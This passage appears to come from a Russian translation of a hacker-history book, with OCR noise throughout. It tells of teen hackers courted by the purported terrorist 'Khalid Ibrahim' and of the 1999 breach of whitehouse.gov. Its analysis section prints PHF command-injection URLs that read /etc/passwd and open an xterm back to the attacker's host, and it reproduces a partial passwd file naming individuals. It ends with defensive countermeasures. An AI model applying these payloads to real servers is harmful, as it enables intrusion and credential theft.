В федеральных тюрьмах США совсем немного столь юных заключенных; поэтому место в Алабаме, куда его направили, правильнее было бы назвать «колонией»; кроме него там находилось еще десять т^ заключенных и, по словам Comrade, оно выглядело «как школа, прав- 5 ш да, с закрытыми дверями и колючей проволокой, но совсем непохо- н жая на тюрьму». Ему даже не приходилось заниматься уроками, пос- -§ кольку он уже прошел школьный курс. "§ Вернувшись в Майами, Comrade опять должен был находиться под постоянным контролем инспектора и ему выдали список хакеров, § с которыми ему запрещено было общаться. «В этом списке были пере- ^ числены «тот парень», «этот парень» и neOh». Имя neOh было указано потому, что правительство знало его только под этой кличкой. «Они не представляли, кто он на самом деле. Если я мог проникнуть в две сотни систем, то он мог это сделать с тысячью», — говорит Comrade.

«neOh был крутым хакером». До сих пор американская Фемида не смогла ни узнать его имени, ни определить его местонахождение.

В ПОИСКАХ ХАЛИДА

Был ли Халид действительно военным, как он утверждал, или же он просто морочил головы несовершеннолетним хакерам? Или же это была провокация ФБР, направленная на то, чтобы узнать, как далеко могут зайти юные хакеры? В тот или иной момент времени, каждый из хакеров, кто общался с Халидом, подозревал, что он не военный; ребят гораздо меньше волновало то, что они передают информацию иностранному шпиону, чем то, что он, возможно, обманывает их. Comrade признавался, что «размышлял очень долго над тем, кто такой Халид. Я не знал — был ли он реальным человеком или провокатором от правительства. Говоря с ним и с neOh, я решил, что он все-таки реален. Но я никогда не брал у него денег — это барьер, который я не хотел переступать». (Чуть раньше в нашем разговоре, когда он впервые упомянул про десять тысяч долларов, что ему предложил Халид, было понятно, что его эта сумма впечатлила. Действительно ли он отказался бы от нее, если бы его попытка кончилась удачей, и Халид заплатил ему? Наверное, даже сам Comrade не смог бы дать ответа на этот вопрос).

По словам neOh, Халид «звучал абсолютно профессионально», он сомневался лишь в его причастности к боевым формированиям. «Все время, пока я общался с ним, я подозревал, что все это обман. Но потом вместе с приятелями, к которым он также обращался и давал другую информацию, мы пришли к единому мнению, что он именно тот, за кого себя выдает».

Еще один хакер — SavecOre, дружески общался на IRC с человеком, который говорил, что его дядя работает в ФБР и обеспечивает 40 неприкосновенность целой хакерской группе MilwOrm. «Я думаю, что это должно было дать понять ФБР, что мы не враждебно настроены», рассказывал SavecOre журналисту Нэйлу Маккею в интервью по электронной почте. «Поэтому я дал ему свой номер телефона. На следующий день мне позвонил так называемый агент ФБР, но у него был чудовищный пакистанский акцент».

«Он сказал, что его зовут Майкл Гордон и что он из отделения ФБР в Вашингтоне», — рассказывал SavecOre журналисту. «Я понял, что это восточный человек». Пока кое-кто из хакеров рассуждал, не может ли этот террорист быть подсадной уткой ФБР, SavecOre пришел к противоположному выводу: что человек, претендующий на роль агента ФБР, был тот же террорист, проверяющий, не хотят ли ребята его «заложить».

Все что происходило, не было похоже на операцию ФБР по одной простой причине. Если бы правительство действительно хотело узнать, на что способны юные хакеры, то оно выделило бы деньги на эту операцию. Когда ФБР подозревает, что ситуация достаточно серьезна для того, чтобы предпринимать реальные шаги, с деньгами задержки быть не может. Обещать neOh тысячу долларов и не платить не имело никакого смысла.

На самом деле только один хакер — Chameleon — получил от Халида хоть какие-то деньги. «Однажды утром я нашел в своем почтовом ящике чек на тысячу долларов и просьбу позвонить в Бостон».

Chameleon был тем хакером, который рассказал одну интересную историю в журнале Wired (в номере от 4 ноября 1998 г.). Из нее Халид узнал, что у него есть схемы правительственных компьютерных сетей и чек был платой за эти карты. Chameleon обналичил свой чек.

Через две недели его задержали агенты ФБР и допрашивали его по поводу этого чека. Он был в совершенном недоумении, как правительство узнало об этой тысяче долларов. Это было еще до трагических событий 11 сентября, когда ФБР активизировало свою деятельность внутри страны, и отслеживало все ниточки, которые могли привести к террористам. Chameleon признал, что получил деньги, но в интервью журналисту настаивал, что не передавал никому схем правительственных сетей.

Хотя он признался в том, что принял деньги от иностранного террориста, что могло привести к обвинению в шпионаже, и ему светило очень долгое заключение, никаких обвинений ему выдвинуто не было, что делало случай еще более загадочным. Вполне возможно, что правительство просто хотело предупредить хакерское сообщество, что иметь дело с иностранными шпионами рискованно. Может быть даже, чек пришел Chameleon не от Халида, а от ФБР.

Мало кто знает настоящее имя Chameleon, и он стремится как можно дольше продлить такое положение вещей. Мы хотели услышать его версию этой истории. Он отказался говорить на эту тему (выдавив из себя только то, что он принимал Халида за сотрудника ФБР, выдающего себя за террориста). Если бы я был на его месте, скорее всего, я бы тоже не хотел говорить о той истории. А ш а "О «ХАРКАД УЛЬ-МУДЖАХИДДИН» | Исследуя записи на IRC-сайтах, журналист Маккей обнаружил, что однажды Халид представился молодым хакерам, как член орга- § низации «Харкад уль-Ансар»3. По данным обзора разведки по Юго- s Восточной Азии, так называлась антиамериканская террористическая организация, связанная с саудовским террористом Осамой бен Ладеном еще с 1997 года. Чтобы избежать проблем со стороны США в 1998 году группа была переименована в «Харкад уль-Муджахиддин»4.

ГЪсударственный департамент США неоднократно предостерегал всех об опасности этой группы. Одно из обращений звучало так: «Пакистанские официальные лица сообщили, что после налета американских самолетов 23 октября 2001 года было убито 22 пакистанских партизана, которые сражались рядом с бойцами Талибана около Кабула.

Все убитые были членами «Харкад уль-Муджахиддин» — организации, Та же статья McKay.

satp.org, - South Asia Intelligence Review.

которая была внесена в официальный список террористических организаций ГЪсударственного Департамента в 1995 году»5.

На самом деле «Харкад» сегодня — это одна из 36 групп, называемых Госдепартаментом иностранными террористическими организациями. Другими словами, правительство США считает их самыми плохими существами на планете.

Естественно, молодые хакеры ничего об этом не знали. Для них все, что они делали, было игрой.

Что касается Халида, то генерал-майор вооруженных сил Индии, выступая с лекцией на тему информационной безопасности в апреле 2002 года, подтвердил, что есть такой террорист, говоря о связях хакеров с «Халидом Ибрагимом из пакистанской организации «Харкад уль-Ансар»6. Генерала заботило то, что Халид располагался не в Пакистане, а на родине генерала — в Дели (Индия).

ПОСЛЕДСТВИЯ 11 СЕНТЯБРЯ (9/11) Хакеры всегда манипулируют и обманывают. Они дурят компьютерные системы, заставляя их думать, что у них есть авторизация, которую они на самом деле украли, они используют методы социальной инженерии, чтобы манипулировать людьми для достижения своих целей. Поэтому, разговаривая с хакером, надо внимательно г м слушать, что он говорит и то, как он это говорит, чтобы попытаться понять, можно ли ему верить. Иногда до конца понять это неI- ВОЗМОЖНО.

Мы с моим соавтором не уверены в том, что neOh искренне говорил нам о своей реакции на 9/11.

Мы изо всех сил старались понять его ощущения:

«Вы знаете, как я рыдал в тот день? Я чувствовал, что моя жизнь окончена».

Эти слова сопровождались нервным смешком — что он означал?

Мы не знаем.

«Если подумать, то я должен был что-то сделать с этим. Если бы я попал в Lockheed Martin или Boing и получил там больше информации, то они могли бы ее использовать. Это было страшное время не только для Америки, но и для меня.

Я плакал, потому что не хотел им помогать. Они меня наняли за мой талант, но если я хоть немного причастен к тому, что случилось с башнями Торгового центра... Эта мысль просто убивала меня!

«The Unired States and the Global Coalition Against Terrorism, september-october 2001: Cronology», http://www.state.gOv/r/pa/ho/pubs/fs/5889.htm.

Adress by Major general Yashwant Deva, AVSM (Retd), President Lete, on «Information Security» at India National Centre, New Delhi on 6 April 2002, p.9.

На самом деле у меня три друга погибли в тот ужасный день, мне никогда не было так плохо».

Многие хакеры начинают заниматься хакерством в подростковом возрасте, а то и раньше. Не слишком ли рано это для того, чтобы распознать потенциальную угрозу твоей стране, когда кто-то просит вас о чем-то? Хотелось бы думать, что 9/11 сделало американских хакеров — даже самых юных — подозрительными в том плане, чтобы не быть игрушкой в руках террористов. Надеюсь, я прав.

БЕЛЫЙ ДОМ ВМЕШИВАЕТСЯ

История компьютерной безопасности в некотором смысле параллельна истории криптографии. В течение столетий создатели кодов разрабатывали шифры, которые они считали «невзламываемыми».

Даже сегодня, когда в новых поколениях компьютеров послание шифруется практически мгновенно при помощи ключей в сотню символов, большинство кодов остаются взламываемыми. (Организация, где разрабатываются и взламываются коды, обладает самыми большими, быстрыми и мощными в мире компьютерами — это Национальное агентство по безопасности).

Компьютерная безопасность похожа на игру кошки и мышки, где на одной стороне выступают эксперты по безопасности, а на другой — хакеры. Код операционной системы Windows содержит десят- А ки миллионов строчек кодов. Естественно, в такой большой прог- 3 рамме опытный хакер всегда сможет найти лазейку.. н "О Тем временем обычные работники компании, чиновники, иногда о даже сотрудники службы безопасности, устанавливая новый компь- "§ ютер или приложение, меняя пароль или создавая новый, совершенно безопасный, оставляют свой компьютер уязвимым. о Если вы читаете новости о хакерских атаках и вторжениях, то ^ должны знать, что хакерам удается проникнуть на военные и правительственные сайты и даже на Интернет-сайт Белого Дома. Иногда по нескольку раз.

Проникнуть на Интернет-сайт и поменять его содержание — это еще полдела, чаще всего это не так сложно сделать. До сих пор многие люди используют один и тот же пароль для различных случаев; если при проникновении в сеть вам удалось получить доступ к паролям, то, скорее всего, вы сможете получить доступ и к другим системам в сети и достигнуть больших результатов. neOh рассказывал, как в 1999 году он с другими членами группы gLobaLheLL сделал именно это с одним из самых чувствительных мест в США — с сайтом Белого Дома.

«В тот момент Белый Дом переустанавливал операционную систему на своих компьютерах. Там сломалось буквально все. И за эти десять-пятнадцать минут Zyklon и MostFearD успели проникнуть внутрь, добраться до файла с паролями, прочесть его и изменить Интернет-сайт. Я был рядом с ними, когда они проделывали все это.

Очень важно бывает оказаться в нужное время в нужном месте. Им это удалось случайно - быть как раз на линии, когда сайт начал обновляться.

Мы обсуждали это в чате gLobaLheLL. Около трех ночи меня разбудил телефонный звонок, и они сообщили, что делают это. Я сказал: «Зашибись! Покажите!». Я просто прыгнул за мой компьютер. Действительно, они сделали это.

MostFearD и Zyklon сделали большую часть работы. Они переслали мне файл с паролями для взлома. Я добыл один пароль - простое слово из словаря. Это было главное».

neOh предоставил нам часть этого сайта с паролями, который его коллеги извлекли и переслали ему, в этой части приведены пароли некоторых известных пользователей из персонала Белого Дома.

neOh никогда не говорил, что текст был в онлайн-доступе.

root:x:0:l:Super-User:/:/sbin/sh

daemon :x: 1:1::/:

bin:x:2:2::/usr/bin:

sys:x:3:3::/:

44 adm:x:4:4:Admin:/var/adm:

uucp:x:5:5:uucp Admin:/usr/lib/uucp:

nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico

listen:x:37:4:Network Admin: /usr/net/nls:

nobody :x: 60001:60001: Nobody: /:

noaccess:x:60002:60002:No Access User:/:

nobody4:x:65534:65534:SunOS 4.x Nobody:/:

bing:x: 1001:10:Bing Feraren:/usr/users/bing: /bin/sh orion:x: 1002:10:Christopher Adams:/usr/users/orion:/usr/ace/sdshell webadm:x: 1130:101 :Web ' Administrator: /usr/users/webadm: /bin/sh cadams:x: 1003:10: Christopher Adams:/usr/users/cadams:/usr/ace/sdshell bartho m:x:1004:101:Mark Подтвердить это трудно. Поскольку атака произошла во время правления президента Клинтона, никто из перечисленных людей уже не работал в Белом Доме. Удалось отыскать лишь несколько свидетельств. Монти Хьямч делал видеозаписи. Кристофер Аламс — имя журналиста из Financial Times, английской газеты — как нам удалось выяснить, в Белом Доме не было сотрудника с таким именем. Дебра Рейд — это фотограф из Associated Press. В Белом Доме не было сотрудника по имени Кони Колабисто; женщина с таким именем была женой Женэ Колабисто, президента компании по решениям для создания изображений, но совершенно непонятна их связь с Белым Домом.

Bartholomew: /usr/users/bartho_m: /usr/ace/sdshell monty:x: 1139:101 :Monty Haymes: /usr/users/monty: /bin/sh debra:x: 1148:10 l:debra Reid:/usr/users/debra:/bin/sh connie:x: 1149:101 :Connie Colabastistto:/usr/users/connie: /bin/sh bilhx: 1005:101:William Hadley:/usr/users/bill:/bin/sh

–  –  –

http://www.attrition.org/mirror/attrltion/1999/05/ 10/www.whitehouse.gov/mirror.html Как вспоминает neOh, ребята, которые хакнули Белый Дом, не чувствовали никакой особой гордости по тому поводу, что им удалось проникнуть на один из десятка самых охраняемых в США Интернет-сайтов. Они постоянно «были заняты тем, что проникали повсюду», объясняет neOh, «чтобы доказать всему миру, что мы самые крутые». Вместо того, чтобы устраивать виртуальные пляски по поводу удачного взлома, все, что они могли сказать друг другу по этому поводу: «Хорошая работа, парни, мы сделали это. Кто следующий?»

Но у них уже оставалось не так много времени для того, чтобы делать следующие взломы. Их мирок уже близился к распаду и в этой части истории опять появляется таинственный Халид.

Теперь Zyklon, известный еще как Эрик Берне, берет нить повествования в свои руки. Он даже не был членом группы gLobaLheLL, по его словам, а просто тусовался на сайтах IRC с некоторыми ребятами. Проникновение на сайт Белого Дома, как он рассказывает, стало возможным после того, как он обнаружил «дыру» в программе под названием PHF, которая использовалась для доступа к базе данных телефонов. Именно эта «дыра» стала уязвимым местом сайта, о ней знали многие в хакерском сообществе, «но немногие люди использовали ее», говорит Zyklon.

Выполнив некоторую последовательность шагов (подробное описание которой приведено в разделе "Анализ" в конце главы), он смог § проникнуть в корневую директорию на сайте whitehouse.gov и получить доступ к другим системам локальной сети, включая и сервер электронной почты Белого Дома. После этого Zyklon получил возможность перехватывать любую переписку между сотрудниками Белого Дома и внешним миром, хотя, естественно, в этих письмах не содержалось никакой секретной информации.

Zyklon также отметил, что он смог «получать копии секретных файлов и файлов паролей». Они тусовались на этом сайте, просматривая, что там есть интересного и дожидаясь, пока сотрудники начнут приходить на работу. Как раз в это время ему позвонил Халид, который сказал, что пишет статью о самых последних хакерских успехах и не может ли ему Zyklon рассказать что-нибудь «свеженькое».

«Я сказал ему, что мы как раз сейчас находимся на Интернет-сайте Белого Дома», — вспоминал Zyklon.

Через несколько часов после этого разговора, рассказывал мне Zyklon, он заметил, что на сайте появился «нюхач» — это системный администратор решил проверить, что происходит на сайте и попытаться установить, кто на нем находится. Что это — случайное совпадение? Или в этот момент появились причины стать подозрительным? Прошли месяцы, пока Zyklon не нашел ответа на этот вопрос.

Как только он обнаружил «нюхач», все хакеры отсоединились от сайта, надеясь, что они заметили администратора быстрее, чем он заметил их присутствие.

Однако, образно говоря, они разворошили осиное гнездо. Через две недели сотрудники ФБР задержали всех членов gLobaLheLL, кого им удалось идентифицировать. Кроме Zyklon (19 лет, задержан в Вашингтоне), они схватили MostHateD (Патрик Грегори, 19 лет, Техас), MindPhasr (Чад Дэвис, Висконсин) и других.

neOh оказался одним из тех, кому удалось уйти. Наслаждаясь ощущением свободы в своем убежище, он решил послать на сайт

Белого Дома оскорбительное сообщение. Вот как оно выглядит:

«Слушайте, Вы, м....и долбаные из ФБР. Не дос.есь до нас, вы все равно проиграете. Ваш домен fbi.gov в наших руках. БОЙТЕСЬ НАС. Вам удалось арестовать нас, поскольку вы, тупые идиоты, смогли вычислить, кто хакнул Белый Дом, верно? Поэтому вы хватаете нас всех и смотрите — кто из нас нарк. ОБЛОМИТЕСЬ, КОЗЛЫ ГРЕБАНЫЕ, МЫ НЕ НАРКУШИ. Понятно? МЫ — ПОВЕЛИТЕЛИ МИРА!»

И подписался: «neOh, немилосердный»9.

ПОСЛЕДСТВИЯ

Как же так случилось, что ранним утром системный администратор решил установить на сайте «нюхач»? Zyklon не сомневался в от- 7^ вете. Когда представители прокуратуры обнародовали свои материалы по данному случаю, он обнаружил там упоминание о том, что н информацию о взломе сайта Белого Дома группой GLobaLHeLL пре- ?

доставил информатор ФБР. Как припоминает Zyklon, там было напи- " Ц сано, что этот информатор живет в Нью-Дели, Индия. " По мнению Zyklon, больше никаких сомнений не оставалось. § Единственный человек, которому он говорил о взломе Белого Дома, 5 был Халид Ибрагим. Один плюс один равно двум: Халид был информантом ФБР.

И все же оставалась некоторая неясность. Даже если Zyklon прав, то вся ли это правда? Кто такой Халид — информатор, помогающий ФБР отлавливать юных хакеров, стремящихся взломать важные сайты? Или же есть иное объяснение: то, что он информатор — это только полправды: кроме этого, он пакистанский террорист, как считает и индийский генерал. Он играет роль двойного агента, сотрудничая и с Талибаном, и с ФБР.

Его постоянные опасения, что кто-то из ребят донесет о нем в ФБР, вполне вписываются в эту версию.

http://www.attrition.org/mirror/attrition/ 1999/05/26/mmic.snu.ac.kr/ Наверняка всю правду о ситуации знали совсем немного людей.

Были ли среди них сотрудники ФБР и прокураторы или же их так же дурачили?

В конце концов, Патрик Грегори и Чад Дэвис были приговорены к двадцати шести месяцам, a Zyklon Берне — к пятнадцати месяцам.

Все трое уже отбыли свои сроки и вышли из тюрьмы.

ПЯТЬ ЛЕТ СПУСТЯ

Сейчас хакерство для Comrade в общем-то, только воспоминание, но и сейчас он заметно оживляется, когда говорит о том, что «это так заводит — делать то, что тебе нельзя делать, лезть туда, куда тебе лезть нельзя, или идти туда, куда нельзя ходить, в поисках чего-нибудь действительно клевого».

Но пора уже и взрослеть. Он говорит, что подумывает о колледже.

Мы разговаривали с ним вскоре после того, как он вернулся из лагеря скаутов в Израиле. Язык не оказался проблемой — он учил иврит в школе и был удивлен тем, насколько хорошо он его помнит.

Его впечатления от страны были самые разные. Девчонки были «действительно классными», оказалось, что израильтяне очень любят Америку. «Казалось, что они берут пример с американцев». Както он был с несколькими израильтянами, которые пили напитки, о которых он никогда не слышал, под названием RC Cola; оказалось, что это американские напитки. Как объяснили израильтяне, «в рекламе говорилось, что американцы пьют именно эти напитки». Он встретил там и «некоторые антиамериканские настроения у людей, которые не были согласны с политикой США», но воспринял это спокойно: «я подумал, что такое можно встретить везде».

Ему очень не понравилась погода, — во время его пребывания «было холодно и дождливо». Были проблемы и с компьютерами. Он купил ноутбук с возможностью беспроводной связи специально для путешествия, но обнаружил, что «дома построены из огромных толстых камней». Его компьютер зарегистрировал пять или даже десять сетей, но сигнал был слишком слабым для соединения, и приходилось идти двадцать минут до того места, где он мог бы установить надежную связь.

Итак, Comrade вернулся в Майами. Совсем еще молодой человек с уголовным преступлением за плечами, он живет в унаследованном доме и собирается принять решение — поступать или не поступать в колледж. Ему двадцать лет и он умеет делать совсем не так уж много.

Старый приятель Comrade neOh работает в крупной телефонной компании (работа с девяти до пяти ему совсем не нравится), но скоро он на три месяца поедет в Лос-Анджелес, где поработает в какой-то лаборатории, потому что там платят во много раз больше, чем он сейчас зарабатывает. Участвуя в жизни общества, он надеется отложить достаточно для того, чтобы купить себе домик там, где он живет.

После того, как трехмесячная «халтура» завершится, neOh тоже подумывает поступить в колледж, но не для того, чтобы изучать компьютерные науки. «Большинство людей со степенью в компьютерных науках, которых я встречал, знали кучу всякого бесполезного дерьма», — говорит он. Он собирается стать экспертом в бизнесе и управлении компаниями, и намерен выйти на компьютерный рынок на серьезном уровне.

Разговор о его старых подвигах возродил в памяти его преклонение перед Кевином. До какой степени он вообразил себя моим последователем?

«Хотел ли я, чтобы меня поймали? И да, и нет. Быть пойманным означало продемонстрировать всем: «Я могу сделать это, я сделал это». Быть пойманным совсем не было для меня главным, но я хотел быть пойманным, чтобы победить их, освободиться и быть хакером, который освободился. Выйдя, я получил бы хорошую работу в правительственном агентстве и установил бы контакты с андерграундом».

НАСКОЛЬКО ВЕЛИКА УГРОЗА? 49 Сочетание усилий профессиональных террористов и бесстрашных юных хакеров может быть совершенно разрушительно для стра- 7^ ны. Рассказанный эпизод заставил меня подумать, как много таких же «халидов», жаждущих больших денег, самоутверждения или дос- н тижения своих целей, вербуют несмышленых детей (или же агрессивно настроенных взрослых хакеров). Помощники новых «халидов»

могут гораздо лучше замаскироваться и их будет труднее отыскать.

Когда я находился в предварительном заключении по обвинению в своих хакерских делах, со мной несколько раз общался один крупный колумбийский наркоторговец. Ему угрожало пожизненное заключение без возможности обжалования. Он предложил выгодную сделку — заплатить мне пять миллионов долларов наличными, если я проникну в «Центр» — компьютерную систему Федерального управления тюрем — и освобожу его из заключения. Этот человек говорил совершенно серьезно и наверняка выполнил бы свое обещание. Я не принял его предложения, но сделал вид, что готов ему помочь, чтобы избежать проблем с ним. Я не знаю, как поступил бы neOh в подобной ситуации.

Наши враги могут серьезно готовить своих солдат для ведения компьютерной войны, для атак на нашу инфраструктуру и для защиты своей. Очевидно, что эти группы будут привлекать себе на помощь умелых хакеров со всего мира, чтобы они «натаскивали» солдат для выполнения спецзаданий.

4. Заказ №К-5669.

В 1997 и в 2003 гг. Министерство обороны проводило специальную операцию (Operation Eligible Receiver) — для того, чтобы проверить уязвимость США перед электронной атакой. В соответствии с отчетом, опубликованным в «Washington Times» о результатах первой такой проверки, «высшие чины Пентагона были потрясены демонстрацией того, как легко хакеры взламывали американские военные и гражданские компьютерные сети». Далее в статье говорилось, что Национальное агентство по безопасности срочно собрало группу компьютерных экспертов — «red team» (Специальный термин, означающий: проверка содержания и качества квалифицированными специалистами, не принимавшими участия в подготовке продукта. Смысл работы red team — проверка систем, программ, военных планов теми, кто может думать, как бандит, хакер, террорист и т. д. — примред) для «мозгового штурма». Их задачей было проанализировать возможности хакеров. Им разрешалось работать только на общедоступном компьютерном оборудовании, используя хакерские средства, включая программы, которые они загружали себе из Интернета или создавали сами.

Через несколько дней группа смогла проникнуть в компьютерные системы, управляющие энергетической сетью и с помощью серии 50 команд могла лишить часть страны электричества. «Если бы действия группы были реальными», — писал тогда журнал «Christian IN Science Monitor», «они могли бы разрушить коммуникационные системы Министерства обороны (вывести из строя большинство тихоь- океанских подразделений) и получить доступ к компьютерным системам на борту военно-морских кораблей США»11.

В моем личном послужном списке есть несколько побед над механизмами безопасности, которые используют американские телефонные компании для управления доступом к телефонным станциям.

Лет десять назад у меня был полный контроль над большинством переключателей таких крупнейших американских телефонных операторов, как Pacific Bell, Sprint, GTE и многие другие. Представьте себе, какой хаос мог возникнуть, если бы такие возможности оказались доступными группе террористов.

Члены Аль-Кайды и других террористических групп используют компьютеры при планировании своих террористических актов. Есть доказательства того, что и при планировании атак 9/11 террористы использовали Интернет.

Если даже Халиду Ибрагиму удалось получить какую-то информацию у кого-то из юных хакеров, ни один из них не сознается в этом.

Если он действительно был связан с атаками на башни Всемирного «Компьютерные хакеры могут вывести из строя оборону; проникновение в системы как секретная миссия», Bill Gertz, Washington Times, 16 апреля 1998.

«Войны будущего...сегодня». Tom Regan, Christian Science Monitor, 24 июня 1999 г.

торгового центра и Пентагон, то доказательств этому нет. Нет сведений и о том, когда он или кто-то из его подручных появятся опять на компьютерной сцене в поисках несмышленых помощников, которые испытывают непреодолимое желание «делать то, что тебе нельзя делать, лезть туда, куда тебе лезть нельзя, или идти туда, куда нельзя ходить, в поисках чего-нибудь действительно клевого». Таких помощников, которые могут считать поставленные перед ними задачи «крутыми».

Для молодых хакеров слабая безопасность остается непреодолимым соблазном. Хакеры, о которых идет речь в этой истории, вынуждены были признать, насколько опасно выполнять задания иностранных заказчиков по проникновению в секретные американские компьютерные сети. Можно только предполагать, сколько других «neOh» были завербованы нашими врагами.

Безопасность стала жизненно важным делом, поскольку мы живем в мире, населенном террористами.

АНАЛИЗ neOh подробно рассказал нам, как он проник в компьютерную систему компании Lockheed Martin. Его рассказ является важным свидетельством, - как пример и для хакеров («Если в системе безопасности есть лазейка, то мы отыщем ее» — таков их лозунг), так и для ^ служб компьютерной безопасности в любой организации. 5 Он быстро определил, что в компании Lockheed Martin использу- н ется собственный сервер доменных имен (DNS — Domain Name ?

Server). DNS — это Интернет-протокол, который, например, транс- "§ лирует имя сайта www.disney.com в 198.187.189.55 — адрес, который может использоваться для маршрутизации пакетов. neOh о знал, что группа исследования безопасности в Польше опубликова- 5 ла то, что хакеры называют «exploit» (подвигом или достижением) — программу, специально созданную для атаки одного конкретного уязвимого места в версии DNS, которую использовала компания Lockheed.

Компания использовала разновидность DNS-протокола под названием BIND (Berkeley Internet Name Domain). Польская группа обнаружила, что одна из версий BIND уязвима перед определенным типом атак (переполнение удаленного буфера) и именно эта версия используется в Lockheed Martin. Следуя инструкциям статьи, neOh смог получить привилегии администратора на обоих серверах компании Lockheed.

После получения этих привилегий neOh организовал перехват паролей и электронной почты при помощи программы «вынюхивания», которая действует, как своеобразное подглядывающее компьютерное устройство. Любой посланный трафик эта программа перехватывает; обычно хакер пересылает перехваченную информацию туда, где ее невозможно найти. Чтобы спрятать координаты «нюхача», рассказывает neOh, он создал директорию без имени, то есть «var/adm/...».

При проверке системный администратор вполне мог и пропустить такую незаметную ссылку.

Подобная техника маскировки программ «вынюхивания» очень эффективна и совсем проста; для сокрытия следов хакерского вмешательства есть много более сложных методов.

Не успев найти пути проникновения в сеть Lockheed Martin для получения секретной информации компании, neOh переключился на другую задачу, поэтому секретные файлы остались нетронутыми.

При проникновении на сайт Белого Дома, как рассказывает Zyklon, он вначале запустил программу под названием CGI-сканер, которая сканирует систему на предмет поиска CGI-лазеек. Он обнаружил, что Интернет-сайт уязвим перед атаками, использующими «PHF-дырку», действие которой основано на программной ошибке, сделанной разработчиками в тексте PHF (телефонной книги).

PHF — это своеобразный интерфейс, который устанавливает соответствие между именем на входе и отыскивает соответствие ему на 52 сервере. Программа вызывает функцию escape_shell_cmd(), которая должна проверять входные данные на наличие в них специальных знаков. Но программисты исключили из этого списка знаков знак перехода на новую строку. Именно это и может использовать умелый хакер, включив во входную информацию этот знак (ОхОа) в расшифрованном виде. Посыл строки с этим знаком превращает текст в команду для исполнения, написанную хакером.

Zyklon напечатал в своем браузере такой адрес:

http: / /www. whitehouse. gov/ cgibm/phf?Qalias=x%0a/bin/cat%20/etc/passwd После этого он смог получить доступ к файлу паролей для whitehouse.gov. Но он стремился получить полный контроль над сервером Белого Дома. Он знал, что скорее всего порты Х-сервера будут защищены специальным экраном, который помешает ему соединиться с любым из сервисов на whitehouse.gov.

Вместо этого он опять использовал «PHF-дырку», напечатав:

http: / /www. whitehouse. gov/ cgibin/phf?Qalias=x%Oaa/usr/XllR6/bin/xterm%20-ut%20display%20zyklons. ip. adress: 0.0 Это привело к посылке xterm с сервера Белого Дома на его компьютер, работающий на сервере X. Таким образом, вместо того, чтобы соединяться с whitehouse.gov, он дал команду системе Белого Дома соединиться с ним. (Это возможно только в том случае, когда защитный экран допускает исходящие соединения — именно такой случай и был реализован в данной ситуации).

Затем он использовал уязвимость перегрузки буфера в системной программе ufsrestore. По словам Zyklon, это позволило ему получить доступ к корневой директории whitehouse.gov, так же как и доступ к почтовому серверу Белого Дома и другим системам сети.

КОНТРМЕРЫ Описанные здесь «подвиги» neOh и Comrade поднимают две серьезные проблемы.

Первая достаточно проста и хорошо известна: используйте только последние релизы операционных систем и приложений в вашем ПО.

Это очень важно, поскольку в них устранены все найденные прорехи в системе безопасности. Причем это не должно делаться случайным образом. Все компании должны разработать специальные программы оповещения ИТ-персонала о том, что появилась очередная заплатка для той или иной программы, имеющейся в их арсенале.

Как только эта заплатка становится готовой к использованию, она должна быть установлена как можно быстрее, пока из-за нее не нарушилась работа ПО компании. Легко представить себе перегруженность ИТ-сотрудников, которые заняты повседневной 7 ч работой (подключение компьютеров новых пользователей — это 3 лишь одна из таких рутинных задач), и установка подобных зап- ^ лат для них — лишняя головная боль. Надо убедить их, что пропуск В хотя бы одной заплатки создает очень высокий риск для всей орга- "§ низации.

Хакеры смогли проникнуть в огромное число систем лишь потому, § что в них своевременно не были установлены заплатки. После того, 5 как та или иная лазейка становится известной, риск проникновения во все компьютеры резко нарастает до тех пор пока производители ПО не создадут устраняющую её заплатку и не распространят ее среди пользователей.

Любая организация должна сделать установку подобных заплаток одной из приоритетных задач ИТ-службы, разработав при этом методику максимально быстрого получения информации о заплатках и установки их с минимальными помехами основному процессу ведения бизнеса.

Но даже такое тщательное отслеживание всех появляющихся лазеек и заплаток недостаточно, как подчеркивает neOh, поскольку некоторые взломы, в которых он участвовал, происходили буквально в «час икс», когда обнаруживалась лазейка — она еще не была известна никому, кроме нескольких экспертов-хакеров. Производители ПО и эксперты в области безопасности физически не успевали создать защиту от нее.

Поскольку всегда остается вероятность, что в вашу систему проникнут именно в «час икс», каждая компания уязвима все то время, пока не появится заплатка к новой лазейке. Как же снизить риск?

На мой взгляд, единственное эффективное решение — использовать модель «глубокой защиты». Мы должны исходить из того, что наша компьютерная система в какой-то момент времени будет подвержена атаке в «час икс». Поэтому мы должны создать такое окружение, которое смогло бы минимизировать возможный вред от проникновения плохих парней в нашу систему. Один из примеров, как уже говорилось, это поместить такую компьютерную систему в «DMZ», то есть — за межсетевой экран. Термин «DMZ» — демилитаризованная зона — взят из обихода военных и политиков, в данном случае он означает, что компьютеры общего доступа (Интернет-сервера, почтовые сервера, DNS-сервера и т.п.) изолированы от корпоративной сети и мест хранения секретной информации. Такая организация компьютерной сети компании — это один из примеров «глубокой защиты».

Даже если хакер обнаружит ранее неизвестную никому лазейку на 54 Интернет-сервере или почтовом сервере и использует ее, он не сможет дотянуться до корпоративной информации благодаря налиг м чию следующего уровня защиты.

Следующая эффективная контрмера против хакеров — это конти- роль сети или даже отдельных ее компьютеров на необычную или подозрительную активность в ней. Атакующий обычно предпринимает определенный набор действий для того, чтобы проникнуть в систему, таких, как попытки получить зашифрованные или обычные пароли, установка «черного хода», изменение файлов конфигурации для ослабления безопасности, модификация системы, приложений или log-файлов и др.

Если организовать постоянно действующий процесс, который отслеживал бы типичные для хакеров виды активности и подавал персоналу сигнал тревоги при их обнаружении, то можно было фиксировать попытки вторжения в систему.

В качестве отдельной темы стоит упомянуть, что пресса несчетное число раз спрашивала меня о наилучших способах защиты вашего компьютера и бизнеса в современных условиях. Один из основных моих советов — использовать более серьезную авторизацию, чем обычные пароли. Обычно вы понимаете, что кто-то украл ваш пароль только после того, как обнаруживаете последствия этого.

Есть много разных технологий авторизации второго уровня, которые можно использовать в сочетании с традиционными паролями, чтобы обеспечить более высокий уровень безопасности. Вдобавок к RSA Secure ID, упомянутой раньше, Safeword Premier Access предлагает специальные устройства (tokens) для генерации паролей, цифровые сертификаты, смарт-карты, биометрическую и другие технологии.

Использование таких типов авторизации, естественно, удорожает систему и добавляет определенные неудобства в работе с ней для каждого пользователя. Все зависит от того, что вы стремитесь защитить. Традиционные пароли вполне достаточны, чтобы защитить сайт газеты, где выложены новые статьи. Но достаточно ли их для того, чтобы защитить чертежи последней модели истребителя?

ПОСЛЕСЛОВИЕ

